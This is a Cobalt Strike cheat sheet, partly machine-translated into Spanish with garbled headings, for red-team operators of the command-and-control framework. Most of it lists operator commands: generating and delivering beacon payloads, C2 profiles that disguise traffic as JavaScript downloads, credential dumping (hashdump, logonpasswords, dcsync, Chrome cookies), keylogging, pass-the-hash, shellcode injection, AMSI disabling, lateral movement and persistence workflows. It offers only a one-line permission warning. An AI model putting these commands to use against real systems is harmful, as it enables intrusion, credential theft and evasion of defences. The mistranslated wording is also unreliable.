Cobalt Strike Cheat Sheet
"Clase de la hoja"
id="copy-btn" class="copy-btn" onclick="copyAllCommands()" Copiar todos los comandos
id="pdf-btn" class="pdf-btn" onclick="generatePDF()" Generar PDF seleccionado/button
■/div titulada
Sinopsis
Cobalt Strike es una plataforma de pruebas de penetración comercial y operaciones de equipo rojo diseñada para emular a actores de amenazas avanzadas. Proporciona un marco posterior a la explotación que permite a los operadores desplegar balizas (agentes) en sistemas comprometidos, establecer canales de mando y control (C2) y realizar diversas operaciones de seguridad ofensivas.
NOVEDAD Advertencia: Cobalt Strike es una herramienta de pruebas de seguridad comercial que sólo debe utilizarse en entornos donde tiene permiso explícito para hacerlo.
Componentes básicos
Team Server
- Servidor central de mando y control
- Corre en Linux
- Manages beacons and listeners
- Proporciona colaboración para operaciones de equipo
Cliente
- Aplicación GUI basada en Java
- Se conecta a Team Server
- Interfaz para que los operadores interactúen con las balizas
- Visualiza las redes de destino
Beacon
- Carga de sueldos primaria para después de la explotación
- Establece la comunicación con Team Server
- Proporciona diversas capacidades para operaciones ofensivas
- Puede operar en diferentes modos de comunicación
Configuración y configuración
Configuración del servidor de equipo
# Start the Team Server
./teamserver <ip_address> <password> [malleable_c2_profile]
# Example
./teamserver 192.168.1.100 P@ssw0rd! c2-profiles/normal/amazon.profile
Configuración del cliente
1. Launch the Cobalt Strike client
2. Connect > New Connection
3. Enter Team Server details:
- Host: <team_server_ip>
- Port: 50050 (default)
- User: <username>
- Password: <password>
4. Verify SSL certificate fingerprint
Oyentes
Creando oyentes
1. Cobalt Strike > Listeners
2. Click "Add"
3. Configure listener settings:
- Name: <listener_name>
- Payload: <beacon_type>
- Host: <callback_domain_or_ip>
- Port: <port_number>
- Profile: <malleable_c2_profile>
4. Click "Save"
Tipos de oyente
| Type |
Description |
| HTTP |
Uses HTTP for C2 communication |
| HTTPS |
Uses HTTPS for C2 communication |
| DNS |
Uses DNS queries for stealthy C2 |
| SMB |
Uses named pipes for peer-to-peer C2 |
| TCP |
Uses direct TCP connections |
| Foreign |
Integrates with other C2 frameworks |
Generación de carga útil
Tipos de carga de Beacon
Attacks > Packages > <payload_type>
| Payload Type |
Description |
| Windows Executable |
Standard .exe file |
| Windows Service EXE |
Service executable |
| DLL |
Dynamic Link Library |
| PowerShell |
PowerShell one-liner |
| Python |
Python script |
| Office Macro |
Macro for Office documents |
| Shellcode |
Raw shellcode |
Kit de artefactos
Attacks > Packages > Windows Executable (S)
Comandos de Beacon
Gestión del período de sesiones
| Command |
Description |
help |
Display help information |
sleep [seconds] [jitter%] |
Set sleep time and jitter |
checkin |
Force immediate check-in |
exit |
Terminate the beacon session |
clear |
Clear the beacon's task queue |
jobs |
List running jobs |
jobkill [JID] |
Kill a running job |
mode dns |
Switch to DNS mode |
mode dns-txt |
Switch to DNS-TXT mode |
mode dns6 |
Switch to DNS6 mode |
mode http |
Switch to HTTP mode |
mode smb |
Switch to SMB mode |
| Command |
Description |
hostname |
Get the hostname |
ipconfig |
Display network configuration |
netstat |
Display network connections |
ps |
List running processes |
tasklist |
Alternative to ps |
getuid |
Get current user ID |
whoami |
Get detailed user information |
pwd |
Print working directory |
drives |
List available drives |
dir [directory] |
List files in directory |
ls [directory] |
Alternative to dir |
net [command] |
Execute net command |
reg query [path] |
Query registry |
sysinfo |
Get system information |
Operaciones de archivo
| Command |
Description |
cd [directory] |
Change directory |
cp [source] [destination] |
Copy a file |
mkdir [directory] |
Create a directory |
mv [source] [destination] |
Move or rename a file |
rm [file] |
Delete a file |
rmdir [directory] |
Delete a directory |
cat [file] |
Display file contents |
download [file] |
Download a file from target |
upload [file] |
Upload a file to target |
timestomp [file] [template] |
Modify file timestamps |
ls-acl [file] |
List file permissions |
Operaciones de procesos
| Command |
Description |
execute [program] |
Execute without capturing output |
shell [command] |
Execute and capture output |
run [program] |
Execute a program |
runas [user] [password] [program] |
Execute as another user |
pth [user] [domain] [hash] |
Pass-the-hash to create a token |
steal_token [pid] |
Steal token from process |
make_token [domain] [user] [password] |
Create a token |
rev2self |
Revert to original token |
getprivs |
Enable system privileges |
getsystem |
Attempt to get SYSTEM privileges |
execute-assembly [file.exe] |
Execute .NET assembly in memory |
powerpick [command] |
Execute PowerShell without powershell.exe |
powershell [command] |
Execute PowerShell command |
psinject [pid] [command] |
Execute PowerShell in specific process |
shinject [pid] [arch] [file.bin] |
Inject shellcode into process |
dllinject [pid] [file.dll] |
Inject DLL into process |
dllload [file.dll] |
Load DLL in beacon process |
Movimiento Lateral
| Command |
Description |
psexec [target] [listener] |
Use PsExec to deploy beacon |
psexec_psh [target] [listener] |
Use PsExec with PowerShell |
winrm [target] [listener] |
Use WinRM to deploy beacon |
wmi [target] [listener] |
Use WMI to deploy beacon |
ssh [target:port] [user] [pass] [listener] |
Use SSH to deploy beacon |
ssh-key [target:port] [user] [key] [listener] |
Use SSH with key authentication |
dcsync [domain] [user] |
Use DCSync to extract password hashes |
jump [method] [target] [listener] |
Jump to target using specified method |
remote-exec [method] [target] [command] |
Execute command on remote system |
Pivoting
| Command |
Description |
rportfwd [bind port] [forward host] [forward port] |
Set up reverse port forward |
rportfwd stop [bind port] |
Stop reverse port forward |
socks [port] |
Start SOCKS proxy server |
socks stop |
Stop SOCKS proxy server |
spunnel [host] [port] |
Create encrypted tunnel over SMB |
spunnel stop |
Stop encrypted tunnel |
covertvpn [interface] [IP/Mask] |
Deploy Covert VPN interface |
covertvpn stop |
Stop Covert VPN |
pivot [host] [port] |
List pivot listeners |
pivotlistener [host] [port] |
Create pivot listener |
Post-Explotación
| Command |
Description |
mimikatz [command] |
Execute Mimikatz command |
hashdump |
Dump password hashes |
logonpasswords |
Dump credentials from memory |
keylogger [pid] |
Start keylogger |
screenshot [pid] |
Take screenshot |
screenwatch [pid] |
Watch target's screen |
printscreen |
Take screenshot using PrintScreen |
reg query [path] |
Query registry |
powerview [command] |
Execute PowerView command |
portscan [targets] [ports] [discovery method] |
Scan for open ports |
browserpivot [pid] [port] |
Hijack authenticated web sessions |
chromedump |
Dump Chrome cookies and login data |
persist [method] [listener] |
Set up persistence |
elevate [exploit] [listener] |
Attempt privilege escalation |
Malleable C2 Profiles
Estructura básica
# Global options
set sleeptime "5000";
set jitter "10";
set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36";
# HTTP staging
http-stager \\\\{
set uri "/jquery-3.3.1.min.js";
client \\\\{
header "Accept" "text/javascript, application/javascript, */*";
\\\\}
server \\\\{
header "Content-Type" "application/javascript";
\\\\}
\\\\}
# HTTP client
http-get \\\\{
set uri "/api/v1/data";
client \\\\{
header "Accept" "application/json";
metadata \\\\{
base64;
prepend "session=";
append ";";
header "Cookie";
\\\\}
\\\\}
server \\\\{
header "Content-Type" "application/json";
output \\\\{
json \\\\{
"status" "success";
"data" "";
\\\\}
prepend "\\\\{\"data\":\"";
append "\"\\\\}";
base64;
\\\\}
\\\\}
\\\\}
Perfiles de prueba
# Verify profile syntax
./c2lint c2-profiles/normal/amazon.profile
# Start Team Server with profile
./teamserver 192.168.1.100 P@ssw0rd! c2-profiles/normal/amazon.profile
Scripts agresivos
Estructura básica del script
# Event handlers
on beacon_initial \\\\{
println("New beacon: " . $1);
\\\\}
# Aliases (custom commands)
alias hello \\\\{
blog($1, "Hello, World!");
\\\\}
# Menus
popup beacon_bottom \\\\{
item "Custom Command" \\\\{
blog($1, "Executing custom command...");
bshell($1, "whoami");
\\\\}
\\\\}
# Functions
sub get_system_info \\\\{
bshell($1, "systeminfo");
\\\\}
Funciones comunes del script
| Function |
Description |
blog($1, "message") |
Write to beacon console |
bshell($1, "command") |
Execute shell command |
bpowershell($1, "command") |
Execute PowerShell command |
bpowerpick($1, "command") |
Execute PowerShell without powershell.exe |
bexecute_assembly($1, "/path/to/file.exe") |
Execute .NET assembly |
bdllspawn($1, "/path/to/file.dll") |
Inject Reflective DLL |
bpsexec($1, "target", "listener") |
Execute PsExec lateral movement |
bwmi($1, "target", "listener") |
Execute WMI lateral movement |
bwinrm($1, "target", "listener") |
Execute WinRM lateral movement |
OPSEC Consideraciones
Inyección del proceso
# Set parent process for new processes
ppid [pid]
# Set process to spawn for post-ex jobs
spawnto x64 %windir%\\sysnative\\rundll32.exe
spawnto x86 %windir%\\syswow64\\rundll32.exe
# Mask command-line arguments
argue [command] [fake arguments]
# Block non-Microsoft DLLs
blockdlls start
blockdlls stop
Técnicas de evacuación
# Obfuscate beacon in memory
sleep_mask [seconds] [jitter%]
# Configure staging process
stage \\\\{
set obfuscate "true";
set stomppe "true";
set cleanup "true";
\\\\}
# Disable AMSI
amsi_disable
# Use smarter process injection
smartinject
Corrientes de trabajo comunes
Acceso inicial
1. Create a listener (Cobalt Strike > Listeners)
2. Generate a payload (Attacks > Packages)
3. Deliver payload to target
4. Wait for beacon check-in
Escalada de Privilege
1. Check current privileges: getuid
2. Attempt to get SYSTEM: getsystem
3. If unsuccessful, try specific exploits: elevate [exploit] [listener]
4. Verify new privileges: getuid
Cosecha temporal
1. Dump hashes: hashdump
2. Dump credentials from memory: logonpasswords
3. Use Mimikatz for advanced options: mimikatz [command]
4. Extract domain hashes (if DC): dcsync [domain] [user]
Movimiento Lateral
1. Identify targets: net view
2. Choose lateral movement technique:
- psexec [target] [listener]
- winrm [target] [listener]
- wmi [target] [listener]
3. Verify new beacon check-in
Persistencia
1. Choose persistence method:
- persist [method] [listener]
- schtasks [options]
- service [options]
- registry [options]
2. Verify persistence works
3. Document persistence mechanisms for cleanup
Recursos